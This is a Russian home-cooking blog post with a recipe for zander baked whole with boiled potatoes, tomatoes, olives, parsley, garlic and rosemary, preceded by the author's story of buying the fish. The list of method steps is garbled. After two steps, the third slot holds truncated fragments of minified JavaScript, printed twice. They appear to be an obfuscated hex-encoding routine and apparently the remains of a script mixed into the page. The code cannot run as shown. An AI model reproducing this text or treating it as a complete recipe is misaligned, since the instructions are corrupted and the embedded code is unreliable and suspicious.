Судак в духовке целиком

Недавно я писала о рыбе, какую мы покупали раньше, какую перестали покупать сейчас из-за дороговизны. И в комментариях к посту, человек , занимающийся поставками рыбы, порекомендовал мне покупать судака.

И я подумала, а ведь правда, почему я так давно его не готовила и совсем забыла? А рыба-то ведь знатная, и весьма универсальная при этом, подходит для любых блюд практически. И я решила срочно наверстывать это упущение. Мужу на рыночную закупку судак был вписан в список. И он привез мне его, огромного, на два килограмма. На рынке мне его почистили и выпотрошили, дело было за малым-приготовить.

Судака я планировала запечь целиком, с овощами и пряными травами. Что с успехом и воплотила, и казавшийся таким огромным судак был целиком съеден за субботним ужином без остатка и с полным восторгом. Белое, нежное и сочное мясо, умеренное количество костей, и конечно свежесть, вот сколько у него плюсов. А минусов, а минусов по моему нет совсем, я рыбу только чистить не люблю, а он ко мне приехал идеально чистеньким. Так что судаку в нашем меню быть, и надеюсь регулярно и часто, рецептов я запланировала много.

Сегодняшний рецепт одновременно довольно простой, но подойдет для угощения гостей. Целиком запеченная рыба смотрится весьма эффектно. Идеально вместо розмарина взять для рыбы шалфей, если найдете.

Ингредиенты:

1.Судак 1,5 кг.

2.Картофель 1 кг.

3.Помидоры 3 шт.

4.Петрушка пол-пучка

5.Чеснок 3 зубчика

6.Розмарин несколько веточек

7.Маслины 50 грамм

8.Масло оливковое 4 -5 ст.л.

9.Соль

10.Перец черный

Готовим!

  • Вымыть щеткой и отварить в мундире до готовности некрупный картофель. Пока картошка вариться, очищенного и потрошенного судака вымыть и обсушить. Сделать ножом косые надрезы с одной стороны рыбы. Застелить пергаментом и сбрызнуть оливковым маслом противень. Посыпать противень солью и положить судака насечками вверх. В каждый надрез положить по веточке розмарина, или листику шалфея, и посолить рыбу внутри и снаружи. Поставить в духовку   на 20 минут.
  • Обдать   готовый картофель холодной водой , очистить и порезать дольками. Сложить в миску, посолить, поперчить, добавить оливки , пару веточек розмарина и пару столовых ложек оливкового масла, перемешать. Петрушку и чеснок мелко порубить. Помидоры разрезать поперек на четыре части. Вынуть противень с рыбой из духовки. С одной стороны рыбы положить картофель, с другой кружки помидоров. На помидоры выложить смесь петрушки с чесноком. Все сбрызнуть оливковым маслом и запекать еще десять минут.
  • // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

    // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

    Читайте также:

    Добавить комментарий

    Ваш адрес email не будет опубликован. Обязательные поля помечены *